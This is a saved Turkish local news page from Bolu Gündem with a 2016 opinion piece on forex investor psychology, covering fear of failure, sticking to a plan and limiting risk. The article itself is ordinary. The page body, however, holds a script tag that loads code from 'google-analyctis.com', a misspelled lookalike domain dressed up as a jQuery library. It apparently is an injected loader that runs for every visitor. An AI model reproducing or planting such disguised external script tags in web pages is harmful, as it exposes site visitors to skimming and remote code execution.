<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="tr-TR" itemscope itemtype="http://schema.org/NewsArticle">
<head>
<base href="http://www.bolugundem.com/" target="_self"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Refresh" content="300" />
<title>Yatırımcının Zincilerinden Kurtulması</title>
<meta name="description" content="Shakespeare’nin de söylediği üzere, “iyi veya kötü diye bir şey yoktur fakat düşünmek bu kavramları mevcur kılar”. Tabi buradan bir yatırımcının beyinsiz olması fikri çıkarılmamalıdır. Neticede bu tip insanlarla kim iş yapmak isteyebilir ki." />
<link rel="canonical" href="http://www.bolugundem.com/yatirimcinin-zincilerinden-kurtulmasi-102734h.htm" />
<link rel="alternate" href="http://www.bolugundem.com/mobi/news_detail.php?id=102734" media="only screen and (max-width: 640px)" />
<link rel="image_src" type="image/jpeg" href="http://www.bolugundem.com/d/news/86977.jpg" />
<meta name="DC.date.issued" content="2016-12-22T16:38:42+02:00" />
<meta property="og:site_name" content="Bolu Gündem Gazetesi" />
<meta property="og:url" content="http://www.bolugundem.com/yatirimcinin-zincilerinden-kurtulmasi-102734h.htm" />
<meta property="og:title" content="Yatırımcının Zincilerinden Kurtulması" />
<meta property="og:description" content="Shakespeare’nin de söylediği üzere, “iyi veya kötü diye bir şey yoktur fakat düşünmek bu kavramları mevcur kılar”. Tabi buradan bir yatırımcının beyinsiz olması fikri çıkarılmamalıdır. Neticede bu tip insanlarla kim iş yapmak isteyebilir ki." />
<meta property="og:image" content="http://www.bolugundem.com/d/news/86977.jpg" />
<meta property="og:type" content="article" />
<meta name="twitter:card" content="summary">
<meta name="twitter:site" content="@">
<meta name="twitter:url" content="http://www.bolugundem.com/yatirimcinin-zincilerinden-kurtulmasi-102734h.htm">
<meta name="twitter:title" content="Yatırımcının Zincilerinden Kurtulması" />
<meta name="twitter:description" content="Shakespeare’nin de söylediği üzere, “iyi veya kötü diye bir şey yoktur fakat düşünmek bu kavramları mevcur kılar”. Tabi buradan bir yatırımcının beyinsiz olması fikri çıkarılmamalıdır. Neticede bu tip insanlarla kim iş yapmak isteyebilir ki." />
<meta name="twitter:image" content="http://www.bolugundem.com/d/news/86977.jpg" />
<meta itemprop="thumbnailUrl" content="http://www.bolugundem.com/d/news_t/86977.jpg" />
<meta itemprop="articleSection" content="Güncel" />
<meta itemprop="dateCreated" content="2016-12-22T16:38:42+02:00" />
<meta itemprop="dateModified" content="2016-12-22T16:38:42+02:00" />
<meta itemprop="image" content="http://www.bolugundem.com/d/news/86977.jpg" />
<link href="http://www.bolugundem.com/s/style.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://www.bolugundem.com/s/function.js"></script><meta name="google-site-verification" content="_3Ay3IQ64zgnagdr5ShjUTUQtGr6MxenZ5w_W5i7_ok" /></head>
<body class="body_main body_prevent" oncontextmenu="return false;" ondragstart="return false;" onselectstart="return false;">
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-59291068-1', 'auto');
  ga('send', 'pageview');
</script><div class="CM_pageskin"><div class="left"><div class="banner_code"><script type="text/javascript">getNormalSWF("175", "300", "http://www.bolugundem.com/d/banner/bilim-okullari-banner-web-2.swf");</script>

<a style="display: block; background-image: url('http://www.bolugundem.com/d/banner/otoilan.png'); background-color: transparent; width: 175px; height: 40px; background-repeat: no-repeat;" width="300" height="40" href="http://www.bolugundem.com/oto-ilan-7s.htm"></a>

<iframe width="175" height="400" frameborder="0" border="0" scrolling="no" marginheight="1" marginwidth="1" src="http://www.ahmetotogaleri.com/otoilan_frame.php" name="otoilan">
</iframe></div></div><div class="right"><div class="banner_code"><script type="text/javascript">getNormalSWF("175", "300", "http://www.bolugundem.com/d/banner/erenler1.20160216130609.swf");</script>

<a href="http://www.finalegitim.com.tr" target="_blank"><img src="http://www.bolugundem.com/d/banner/final-haziran2016.20160720131739.jpg" width="175" height="320" border="0" alt=""/></a></div></div></div><div class="main_container"><div class="base_topbar_outer"><div class="base_topbar base_position"><ul class="quick_launch"><li class="parent"><a href="http://www.bolugundem.com//" target="_self">Ana Sayfa</a></li><li class="parent"><a href="http://www.bolugundem.com/guest_book.php" target="_self">Ziyaretçi Defteri</a></li><li class="parent"><a href="http://www.bolugundem.com/sitene-ekle.htm" target="_self">Sitene Ekle</a></li><li class="parent"><a href="http://www.bolugundem.com/search_result.php" target="_self">Arşiv</a></li><li class="sole"><a href="http://www.bolugundem.com/e_gazette.php" target="_self">E- Gazete</a></li><li class="parent"><a href="#" target="_self" onclick="this.style.behavior='url(#default#homepage)';this.setHomePage('http://www.bolugundem.com');return false;">Anasayfam Yap</a></li></ul><div class="currency_slider" id="currency_slider"><div class="viewport"><ul class="overview"><li class="down"><span><b>BIST</b> 77.508</span></li><li class="down"><span><b>Altın</b> 127,591</span></li><li class="up"><span><b>Dolar</b> 3,5119</span></li><li class="up"><span><b>Euro</b> 3,6723</span></li></ul></div></div><div class="weather_slider" id="weather_slider"><div class="viewport"><ul class="overview"><li style="background-position: -3px -870px;"><span>Bolu</span> 1 °C</li><li style="background-position: -3px -319px;"><span>İstanbul</span> 6 °C</li><li style="background-position: -3px -812px;"><span>Ankara</span> 0 °C</li></ul></div></div><form action="search_result.php" method="get"><input class="search_input" type="text" name="search_key" placeholder="Site içi arama" /><input class="search_button" type="submit" value="" /></form></div></div><div class="base_outer clearfix"><div class="banner wide_banner" style="padding-top: 10px;"><div class="inner" id="banner_logo_top"><script src='http://ads.wordego.com/a.js?did=3965756b57503730345231474e536a76626a325248773d3d&size=970x90' type='text/javascript'></script></div></div><div class="base_top base_position"><div class="logo"><a href="http://www.bolugundem.com/" rel="home"><img src="http://www.bolugundem.com/s/i/logo.png" alt="Bolu Gündem Gazetesi" width="250" height="130" /></a></div><div class="banner_spec"><a href="" target=""><img src="http://www.bolugundem.com/d/banner/erdal-yeni-logo.png" width="220" height="124" border="0" alt=""/></a></div><div class="banner"></div><div class="nav-mini"><a href="http://www.bolugundem.com/" title="Anasayfa" rel="home"></a></div><div class="nav-mini-2"><a href="http://www.bolugundem.com/foto-galeri.htm" title="Foto Galeri"></a><a href="http://www.bolugundem.com/video-galeri.htm" title="Video Galeri"></a></div><div class="last_min" id="last_min"><div class="viewport"><ul class="overview"><li><a href="http://www.bolugundem.com/fetoden-gozaltina-alinan-askerler-adliyeye-sevk-edildi-102732h.htm">FETÖ’den gözaltına alınan askerler adliyeye sevk edildi</a></li><li><a href="http://www.bolugundem.com/narven-kariyer-gunlerine-buyuk-ilgi-102735h.htm">Narven kariyer günlerine büyük ilgi</a></li><li><a href="http://www.bolugundem.com/yatirimcinin-zincilerinden-kurtulmasi-102734h.htm">Yatırımcının Zincilerinden Kurtulması</a></li><li><a href="http://www.bolugundem.com/ogrenciler-halep-ve-sehitler-icin-yurudu-102733h.htm">Öğrenciler Halep ve şehitler için yürüdü</a></li><li><a href="http://www.bolugundem.com/boluya-3-milyonluk-ek-odenek-102731h.htm">BOLU’YA 3 MİLYONLUK EK ÖDENEK</a></li><li><a href="http://www.bolugundem.com/ozcandan-komisyona-sitem-102730h.htm">ÖZCAN’DAN KOMİSYONA SİTEM</a></li><li><a href="http://www.bolugundem.com/tadimiz-tuzumuz-kalmadi-102729h.htm">Tadımız tuzumuz Kalmadı</a></li><li><a href="http://www.bolugundem.com/iki-el-bir-bas-icin-102727h.htm">İKİ EL BİR BAŞ İÇİN</a></li><li><a href="http://www.bolugundem.com/taskestililere-cagri-son-gun-yarin-102726h.htm">TAŞKESTİLİLERE ÇAĞRI SON GÜN YARIN!</a></li><li><a href="http://www.bolugundem.com/penaltilar-olmasa-bolu-liderdi-102725h.htm">Penaltılar olmasa Bolu liderdi!..</a></li><li><a href="http://www.bolugundem.com/mehmet-akyuz-sesleri-102724h.htm">Mehmet Akyüz sesleri</a></li><li><a href="http://www.bolugundem.com/acimiz-buyuk-102723h.htm">Acımız büyük!</a></li><li><a href="http://www.bolugundem.com/hali-saha-ayakkabisi-ile-ciktilar-102722h.htm">Halı saha ayakkabısı ile çıktılar</a></li><li><a href="http://www.bolugundem.com/kar-en-cok-onlara-yaradi-102721h.htm">Kar en çok onlara yaradı</a></li><li><a href="http://www.bolugundem.com/yilmaz-ozan-ozen-kutuphanesinin-acilisini-yapti-102720h.htm">Yılmaz, Ozan Özen Kütüphanesi’nin açılışını yaptı</a></li></ul></div></div><div class="social"><a href="https://www.facebook.com/bolugundem" style="background-position: left -168px;" target="_blank" title="Facebook ile paylaş"></a><a href="http://www.bolugundem.com/rss/" style="background-position: left -144px;" target="_blank" title="RSS, News Feed, Haber Beslemesi"></a></div><ul class="nav"><li class="sep2"></li><li class="item parent"><a class="inr" href="http://www.bolugundem.com/resmi-ilanlar-haberleri-14hk.htm" target="_self"><span>RESMİ İLANLAR</span></a></li><li class="sep"></li></ul></div><div class="banner wide_banner"><div class="inner" id="banner_logo_bottom"><a href="" target=""><img src="http://www.bolugundem.com/d/banner/728.gif" width="980" height="120" border="0" alt=""/></a></div></div></div><div class="base_outer"><div id="base" class="base base_position clearfix"><div id="base_middle" class="base_middle"><div class="middle_content_title"><h1 itemprop="name">Yatırımcının Zincilerinden Kurtulması</h1></div><div class="middle_content_top"><div class="top_social"><script type="text/javascript">showBookmark3();</script></div><div class="nav" itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://www.bolugundem.com/" rel="home"><span itemprop="title">Ana Sayfa</span></a><span itemprop="child" itemscope itemtype="http://data-vocabulary.org/Breadcrumb">&raquo; <a itemprop="url" href="http://www.bolugundem.com/guncel-haberleri-12hk.htm" rel="self"><span itemprop="title">Güncel</span></a></span></div><div class="text_size"><img src="http://www.bolugundem.com/s/i/1x1.gif" onclick="changeFontSize('#news_content', 'd');" title="Yazıyı küçült" width="24" height="18" alt="" /><img src="http://www.bolugundem.com/s/i/1x1.gif" onclick="changeFontSize('#news_content', 'u');" title="Yazıyı büyüt" width="24" height="18" alt="" /></div><div class="tools"><a class="go_comment" rel="nofollow" href="#" onclick="$.scrollTo('.comment_add', 600); return false;" target="_blank" title="Yorum Yap"></a><a class="go_send" rel="nofollow" href="javascript:void(0)" onclick="return openPopUp_520x390('http://www.bolugundem.com/send_to_friend.php?type=1&amp;id=102734');" title="Arkadaşına Gönder"></a><a class="go_print" rel="nofollow" href="javascript:void(0)" onclick="return openPopUp_670x500('http://www.bolugundem.com/print.php?type=1&amp;id=102734')" title="Yazdır"></a></div><div class="top_date" itemprop="datePublished" content="2016-12-22T15:36:00+02:00">22.12.2016 15:36</div></div><div class="middle_content"><div class="news_detail"><div class="side_detail"><img itemprop="image" class="image" src="http://www.bolugundem.com/d/news/86977.jpg" alt="Yatırımcının Zincilerinden Kurtulması" width="300" height="225" /></div><div itemprop="description" class="short_content">Shakespeare’nin de söylediği üzere, “iyi veya kötü diye bir şey yoktur fakat düşünmek bu kavramları mevcur kılar”. Tabi buradan bir yatırımcının beyinsiz olması fikri çıkarılmamalıdır. Neticede bu tip insanlarla kim iş yapmak isteyebilir ki.</div><div itemprop="articleBody" id="news_content" class="text_content"><p>Yine de, bazı zamanlar vardır ki kahvenin kokusunu içinize kadar çekmeli, gündüz havasını ciğerlerinize doldurmalı ve amaçladığınız kazançları gerçeğe döndürmek için dışarı çıkmasılısınız.</p><p>&nbsp;</p><p>Tarihe adını altın harflerle yazdırmış önemli kişilerin sözlerini bugün bile kullanabilir ve tedirgin bir yatırımcının yaşadığı ikilemi net bir şekilde rahatlıkla ortaya koyabiliriz.</p><p>&nbsp;</p><p>En büyük korku (boğularak ölmek veya diri diri gömülmek haricinde) başarısızlık korkusudur. Fakat başarısızlığı tatmazsak başarıyı anlayamayız ve onun değerini kavrayamayız. <strong><a rel="nofollow" target="_blank" href="http://www.bolugundem.com/mum-isigi-notlar-3-11608yy.htm">Ünlü bilim adamı Albert Einstein</a></strong>’in de söylediği gibi, “Hata yapmamış insan hiç yeni bir şey denememiş demektir”. Döviz piyasası dünyasına girdikten sonra hiç yanlış bir işlem yapmamış ve her işleminden kazançla çıkan bir yatırımcıyı hayal etmek dahi çok zordur.</p><p>&nbsp;</p><p>Forex piyasasında mutlaka bir planınız olması şarttır. Bu plan sizi piyasanın gün içerisindeki anlamsız çalkantılardan korumalı ve kararlarınızı daha genele göre almanızı sağlamalıdır. Sizi hislerinizden arındırırken rasyonel düşünmenize yardımcı olmalıdır.</p><p>&nbsp;</p><p>Güvensizlik hissi pek çok farklı şekilde karşınıza çıkabilir. Yatırımcılar <strong><a rel="nofollow" target="_blank" href="http://tr.dailyforex.com/forex-articles/2015/11/forex-piyasas%C4%B1nda-dalgalanmalara-y%C3%B6nelik-i%C5%9Flem-stratejisi/50371">piyasadaki akımın farkında olsalar</a></strong> da bunu nasıl işleme dökmeleri gerektiği konusunda güvensizlik çekebilir. İşlem sonrasında, özellikle piyasanın tahmin edilen yönün tam ters doğrultuda hareket ettiği vakalarda, güvensizlik faktörü belirgin bir hale gelir. Fiyatların sizin umduğunuzun aksine ilerlemesini takiben hem güveninizi yitirirsiniz hem de piyasayı şuçlamaya başlarsınız!</p><p>&nbsp;</p><p>Yatırım dünyasındaki işlemlere yönelik en iyi yaklaşım sisteminize inancınızı kaybetmemeniz ve değişen piyasa koşulları dolayısıyla zaman zaman kayıplara maruz kalacağınızı kabul etmenizdir. Piyasayı etkilemeniz mümkün değildir. Yapabileceğiniz tek şey, değişime ayak uydurmanızdır.</p><p>&nbsp;</p><p>Piyasaya sizi yön vermeniz söz konusu olmasa bile, planınız tamamen sizin kontrolünüzdedir. Hiçbir pozisyonun kazançla neticeleneceği garantisi yoktur.</p><p>&nbsp;</p><p>Endişelerinizi kontrol etmenizin bir diğer yolu ise aldığınız riski sınırlı düzeylerde tutmanızdır. Kazançların veya kayıpların sizin üzerinizdeki etkisi pozisyonunuz ile doğru orantılıdır. Yaşadıklarınız sizin tecrübenizi artıracaktır ve bu yüzden güven kazanmanız konusunda önemli bir role sahiptir.</p><p>&nbsp;</p><p>Tecrübeli yatırımcılardan görüş beyanı talebinde de bulunabilirsiniz. Sürekli bir şekilde grafiklere odaklanmayın ve pozisyonunuza yönelik endişelerinizi körükleyecek hareketlerden kaçının.</p><p>&nbsp;</p><p>Korkularınızla, onlar bir çığ haline gelerek sizi içine çekecek kadar büyümeden, yüzleşin. İyi şanslar!</p></div><div class="clear"></div></div><script type="text/javascript">showBookmark5("https://www.facebook.com/bolugundem", "", "");</script><div class="comment_navigation"><div class="container"><div class="tools"><a class="go_send" rel="nofollow" href="javascript:void(0)" onclick="return openPopUp_520x390('http://www.bolugundem.com/send_to_friend.php?type=1&amp;id=102734');" title="Arkadaşına Gönder"></a><a class="go_print" rel="nofollow" href="javascript:void(0)" onclick="return openPopUp_670x500('http://www.bolugundem.com/print.php?type=1&amp;id=102734')" title="Yazdır"></a><a class="go_top" rel="nofollow" href="/yatirimcinin-zincilerinden-kurtulmasi-102734h.htm#top" onclick="scrollPage(0); return false;" title="Yukarı"></a></div><script type="text/javascript">showBookmark4();</script></div></div><div class="comment_add"><form method="post" id="comment_form" onsubmit="return addComment(1, 102734);"><textarea name="comment_content" id="comment_content" class="comment_content" rows="6" placeholder="Yorumunuz" maxlength="500"></textarea><input type="text" name="member_name" id="member_name" class="member_name" placeholder="Adınız" /><input type="submit" name="comment_submit" id="comment_submit" class="comment_submit" value="GÖNDER" /><input type="hidden" name="reply" id="reply" value="0" /><div class="reply_to"></div></form><div class="info"><b>UYARI:</b> Küfür, hakaret, rencide edici cümleler veya imalar, inançlara saldırı içeren, imla kuralları ile yazılmamış,<br /> Türkçe karakter kullanılmayan ve büyük harflerle yazılmış yorumlar onaylanmamaktadır.</div></div><div class="comment"><div class="container"><div class="content" align="center">Bu habere henüz yorum eklenmemiştir.</div></div><div class="btm"></div></div><div class="latest_gallery"><div class="caption">SON EKLENEN <span>GALERİLER</span></div><ul class="content"><li><a class="image icon_1" href="http://www.bolugundem.com/narven-kariyer-gunlerine-buyuk-ilgi-1635g.htm"><img src="http://www.bolugundem.com/d/gallery/1635_s.jpg" alt="Narven kariyer günlerine büyük ilgi" width="134" height="89" /><span></span></a><a class="title" href="http://www.bolugundem.com/narven-kariyer-gunlerine-buyuk-ilgi-1635g.htm">Narven kariyer günlerine büyük ilgi</a></li><li><a class="image icon_1" href="http://www.bolugundem.com/ogrenciler-halep-icin-yurudu-1634g.htm"><img src="http://www.bolugundem.com/d/gallery/1634_s.jpg" alt="Öğrenciler Halep için yürüdü" width="134" height="89" /><span></span></a><a class="title" href="http://www.bolugundem.com/ogrenciler-halep-icin-yurudu-1634g.htm">Öğrenciler Halep için yürüdü</a></li><li><a class="image icon_1" href="http://www.bolugundem.com/yilmaz-ozan-ozen-kutuphanesinin-acilisini-yapti-1633g.htm"><img src="http://www.bolugundem.com/d/gallery/1633_s.jpg" alt="Yılmaz, Ozan Özen Kütüphanesi’nin açılışını yaptı" width="134" height="89" /><span></span></a><a class="title" href="http://www.bolugundem.com/yilmaz-ozan-ozen-kutuphanesinin-acilisini-yapti-1633g.htm">Yılmaz, Ozan Özen Kütüphanesi’nin açılışını yaptı</a></li><li><a class="image icon_1" href="http://www.bolugundem.com/cocuklarin-kar-eglencesi-1632g.htm"><img src="http://www.bolugundem.com/d/gallery/1632_s.jpg" alt="Çocukların kar eğlencesi" width="134" height="89" /><span></span></a><a class="title" href="http://www.bolugundem.com/cocuklarin-kar-eglencesi-1632g.htm">Çocukların kar eğlencesi</a></li></ul></div><div class="middle_sub_page_title"><span>Diğer Haberler</span></div><div class="news_set"><div class="inner clearfix"><div><a class="image" href="http://www.bolugundem.com/fetoden-gozaltina-alinan-askerler-adliyeye-sevk-edildi-102732h.htm"><img src="http://www.bolugundem.com/d/news_t/86975.jpg" alt="FETÖ’den gözaltına alınan askerler adliyeye sevk edildi" width="210" height="157" /></a><a class="content" href="http://www.bolugundem.com/fetoden-gozaltina-alinan-askerler-adliyeye-sevk-edildi-102732h.htm"><span>FETÖ’den gözaltına alınan askerler adliyeye sevk edildi</span>Bolu’da Cumhuriyet Başsavcılığı tarafından yürütülen FETÖ/PDY soruşturmaların kapsamında gözaltına alınan 2 asker adliyeye sevk edildi.</a></div><div><a class="image" href="http://www.bolugundem.com/narven-kariyer-gunlerine-buyuk-ilgi-102735h.htm"><img src="http://www.bolugundem.com/d/news_t/86978.jpg" alt="Narven kariyer günlerine büyük ilgi" width="210" height="157" /></a><a class="content" href="http://www.bolugundem.com/narven-kariyer-gunlerine-buyuk-ilgi-102735h.htm"><span>Narven kariyer günlerine büyük ilgi</span>Abant İzzet Baysal Üniversitesi Girişim Topluluğu ve Narven Otel’in departman yöneticileri ile ortaklaşa düzenlenen kariyer günleri konferansına öğrenciler tarafından ilgi büyüktü.</a></div><div><a class="image" href="http://www.bolugundem.com/yatirimcinin-zincilerinden-kurtulmasi-102734h.htm"><img src="http://www.bolugundem.com/d/news_t/86977.jpg" alt="Yatırımcının Zincilerinden Kurtulması" width="210" height="157" /></a><a class="content" href="http://www.bolugundem.com/yatirimcinin-zincilerinden-kurtulmasi-102734h.htm"><span>Yatırımcının Zincilerinden Kurtulması</span>Shakespeare’nin de söylediği üzere, “iyi veya kötü diye bir şey yoktur fakat düşünmek bu kavramları mevcur kılar”. Tabi buradan bir yatırımcının beyinsiz olması fikri çıkarılmamalıdır. Neticede bu tip insanlarla kim iş yapmak isteyebilir ki.</a></div><div><a class="image" href="http://www.bolugundem.com/ogrenciler-halep-ve-sehitler-icin-yurudu-102733h.htm"><img src="http://www.bolugundem.com/d/news_t/86976.jpg" alt="Öğrenciler Halep ve şehitler için yürüdü" width="210" height="157" /></a><a class="content" href="http://www.bolugundem.com/ogrenciler-halep-ve-sehitler-icin-yurudu-102733h.htm"><span>Öğrenciler Halep ve şehitler için yürüdü</span>Abant İzzet Baysal Üniversitesi Öğrenci Konseyi ve topluluklarından oluşan öğrenci grubu Halep ve şehitler için yürüyüş yaptı.</a></div><div><a class="image" href="http://www.bolugundem.com/boluya-3-milyonluk-ek-odenek-102731h.htm"><img src="http://www.bolugundem.com/d/news_t/86973.jpg" alt="BOLU’YA 3 MİLYONLUK EK ÖDENEK" width="210" height="157" /></a><a class="content" href="http://www.bolugundem.com/boluya-3-milyonluk-ek-odenek-102731h.htm"><span>BOLU’YA 3 MİLYONLUK EK ÖDENEK</span>Bolu İl Genel Meclis Başkanı Yaşar Yüceer, ilimize yapılacak yatırımlarda kullanılmak üzere 3 Milyon TL’lik ekstra ödeneğin İl Özel İdaresine yatırılacağının müjdesini verdi.</a></div><div><a class="image" href="http://www.bolugundem.com/ozcandan-komisyona-sitem-102730h.htm"><img src="http://www.bolugundem.com/d/news_t/86972.jpg" alt="ÖZCAN’DAN KOMİSYONA SİTEM" width="210" height="157" /></a><a class="content" href="http://www.bolugundem.com/ozcandan-komisyona-sitem-102730h.htm"><span>ÖZCAN’DAN KOMİSYONA SİTEM</span>CHP Bolu Milletvekili Tanju Özcan önceki gün sosyal medya hesabından yaptığı paylaşımla Anayasa Komisyonu üyesi AKP’lilere sitem etti.</a></div></div></div><div class="news_list_view"><li><a href="http://www.bolugundem.com/tadimiz-tuzumuz-kalmadi-102729h.htm">Tadımız tuzumuz Kalmadı</a><span>22 Aralık 2016 Perşembe 12:16</span></li><li><a href="http://www.bolugundem.com/iki-el-bir-bas-icin-102727h.htm">İKİ EL BİR BAŞ İÇİN</a><span>22 Aralık 2016 Perşembe 11:48</span></li><li><a href="http://www.bolugundem.com/taskestililere-cagri-son-gun-yarin-102726h.htm">TAŞKESTİLİLERE ÇAĞRI SON GÜN YARIN!</a><span>22 Aralık 2016 Perşembe 11:21</span></li><li><a href="http://www.bolugundem.com/kar-en-cok-onlara-yaradi-102721h.htm">Kar en çok onlara yaradı</a><span>22 Aralık 2016 Perşembe 10:44</span></li><li><a href="http://www.bolugundem.com/yilmaz-ozan-ozen-kutuphanesinin-acilisini-yapti-102720h.htm">Yılmaz, Ozan Özen Kütüphanesi’nin açılışını yaptı</a><span>22 Aralık 2016 Perşembe 10:36</span></li><li><a href="http://www.bolugundem.com/bolulular-belediye-hizmetlerinden-memnun-102719h.htm">Bolulular, belediye hizmetlerinden memnun</a><span>22 Aralık 2016 Perşembe 10:33</span></li><li><a href="http://www.bolugundem.com/turkan-saylan-kutuphanesine-bilgisayar-hibe-edildi-102718h.htm">Türkan Saylan Kütüphanesi’ne  bilgisayar hibe edildi</a><span>22 Aralık 2016 Perşembe 10:16</span></li><li><a href="http://www.bolugundem.com/organik-tarim-potansiyeli-degerlendirildi-102717h.htm">Organik Tarım Potansiyeli Değerlendirildi</a><span>22 Aralık 2016 Perşembe 10:12</span></li><li><a href="http://www.bolugundem.com/baskan-boluyu-buyuksehir-yapmaya-kararli-102715h.htm">BAŞKAN BOLU’YU BÜYÜKŞEHİR YAPMAYA KARARLI</a><span>22 Aralık 2016 Perşembe 09:58</span></li><li><a href="http://www.bolugundem.com/seb-i-arus-istanbulun-geliri-tok-hay-dere-bagislanacak-102714h.htm">ŞEB-İ ARUS İSTANBUL’UN GELİRİ, TOK-HAY-DER’E BAĞIŞLANACAK!</a><span>22 Aralık 2016 Perşembe 09:53</span></li></div></div></div><div id="base_side" class="base_side"><div class="banner side_banner"><a href="http://www.gazellehotels.com.tr/" target="_blank"><img src="http://www.bolugundem.com/d/banner/15328403_233248790438507_1906393660_n.jpg" width="300" height="300" border="0" alt=""/></a></div><div class="side_caption"><span>ÜYE İŞLEMLERİ</span></div><div class="side_content"><div class="member_box" id="loginbox_container"></div></div><div class="side_content_bottom"></div><div class="side_caption side_caption_2"><a href="http://www.bolugundem.com/yazarlar.htm">YAZARLAR</a></div><div class="side_content"><div class="author_side" id="author_side_1"><div class="viewport"><ul class="overview"><li><a class="content" href="http://www.bolugundem.com/tadimiz-tuzumuz-kalmadi-15332yy.htm">Cevat Özsoy<span>Tadımız tuzumuz Kalmadı</span></a><a class="image" href="http://www.bolugundem.com/tadimiz-tuzumuz-kalmadi-15332yy.htm"><img src="http://www.bolugundem.com/d/author/425_s.jpg" alt="Cevat Özsoy" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/iki-el-bir-bas-icin-15331yy.htm">Mustafa Namdar<span>İKİ EL BİR BAŞ İÇİN</span></a><a class="image" href="http://www.bolugundem.com/iki-el-bir-bas-icin-15331yy.htm"><img src="http://www.bolugundem.com/d/author/10_s.jpg" alt="Mustafa Namdar" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/universitemiz-buyuyor-15330yy.htm">Nizamettin YILDIRIM<span>Üniversitemiz Büyüyor</span></a><a class="image" href="http://www.bolugundem.com/universitemiz-buyuyor-15330yy.htm"><img src="http://www.bolugundem.com/d/author/395_s.jpg" alt="Nizamettin YILDIRIM" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/normal-degildir-15328yy.htm">Makinist<span>Normal değildir</span></a><a class="image" href="http://www.bolugundem.com/normal-degildir-15328yy.htm"><img src="http://www.bolugundem.com/d/author/386_s.jpg" alt="Makinist" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/kitap-konser-bile-bedava-15326yy.htm">Suat Tosun<span>KİTAP   KONSER    BİLE   BEDAVA …</span></a><a class="image" href="http://www.bolugundem.com/kitap-konser-bile-bedava-15326yy.htm"><img src="http://www.bolugundem.com/d/author/380_s.jpg" alt="Suat Tosun" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/akyuvarlar-15325yy.htm">İlhami Candemir<span>Akyuvarlar</span></a><a class="image" href="http://www.bolugundem.com/akyuvarlar-15325yy.htm"><img src="http://www.bolugundem.com/d/author/402_s.jpg" alt="İlhami Candemir" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/kanatlarim-15323yy.htm">Aydın Hitit<span>KANATLARIM</span></a><a class="image" href="http://www.bolugundem.com/kanatlarim-15323yy.htm"><img src="http://www.bolugundem.com/d/author/348_s.jpg" alt="Aydın Hitit" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/kurt-kardes-yak-bir-sigara-15322yy.htm">Hüseyin KAYA<span>Kürt kardeş yak bir sigara</span></a><a class="image" href="http://www.bolugundem.com/kurt-kardes-yak-bir-sigara-15322yy.htm"><img src="http://www.bolugundem.com/d/author/391_s.jpg" alt="Hüseyin KAYA" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/islamin-yahudilestirilmesine-firsat-vermeyelim-iii-15316yy.htm">Hasan Dinç<span>İSLÂM’IN YAHUDİLEŞTİRİLMESİNE FIRSAT VERMEYELİM (III)</span></a><a class="image" href="http://www.bolugundem.com/islamin-yahudilestirilmesine-firsat-vermeyelim-iii-15316yy.htm"><img src="http://www.bolugundem.com/d/author/354_s.jpg" alt="Hasan Dinç" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/a-i-d-i-y-e-t-d-u-y-g-u-s-u-2-15302yy.htm">Aykut Karagüzel<span>A İ D İ Y E T    D U Y G  U S U - 2</span></a><a class="image" href="http://www.bolugundem.com/a-i-d-i-y-e-t-d-u-y-g-u-s-u-2-15302yy.htm"><img src="http://www.bolugundem.com/d/author/330_s.jpg" alt="Aykut Karagüzel" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/kardelen-kultur-ve-sanat-sarayina-kavusacak-miyiz-15237yy.htm">Şenda Aksungur<span>Kardelen Kültür ve Sanat sarayına kavuşacak mıyız?</span></a><a class="image" href="http://www.bolugundem.com/kardelen-kultur-ve-sanat-sarayina-kavusacak-miyiz-15237yy.htm"><img src="http://www.bolugundem.com/d/author/382_s.jpg" alt="Şenda Aksungur" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/belediyeler-vatana-ihanet-etme-yeri-degildir-15186yy.htm">Bülent Dinçtürk<span>BELEDİYELER VATANA İHANET ETME YERİ DEĞİLDİR</span></a><a class="image" href="http://www.bolugundem.com/belediyeler-vatana-ihanet-etme-yeri-degildir-15186yy.htm"><img src="http://www.bolugundem.com/d/author/55_s.jpg" alt="Bülent Dinçtürk" width="45" height="54" /></a></li><li><a class="content" href="http://www.bolugundem.com/fani-dunyaya-devam-45-15087yy.htm">A. Şerafettin Şenyüz<span>Fani Dünya’ya devam (45)</span></a><a class="image" href="http://www.bolugundem.com/fani-dunyaya-devam-45-15087yy.htm"><img src="http://www.bolugundem.com/d/author/351_s.jpg" alt="A. Şerafettin Şenyüz" width="45" height="54" /></a></li></ul></div><div class="side_tiny_pager"><div class="buttons prev" title="Geri"></div><div class="pager"><span class="pagenum" data-index="0">1</span><span class="pagenum" data-index="1">2</span><span class="pagenum" data-index="2">3</span></div><div class="buttons next" title="İleri"></div></div></div></div><div class="side_content_bottom"></div><div class="banner side_banner"><script src='http://ads.wordego.com/a.js?did=3965756b57503730345231474e536a76626a325248773d3d&size=300x250' type='text/javascript'></script></div><div class="side_caption side_caption_3"><a href="http://www.bolugundem.com/foto-galeri.htm">FOTO GALERİ</a></div><div class="side_content"><ul class="gallery_side" id="gallery_side"><li class="item"><a href="http://www.bolugundem.com/narven-kariyer-gunlerine-buyuk-ilgi-1635g.htm"><img src="http://www.bolugundem.com/d/gallery/1635_s.jpg" alt="Narven kariyer günlerine büyük ilgi" width="127" height="96" /><span class="tl"></span><span class="wrapword">Narven kariyer günlerine büyük 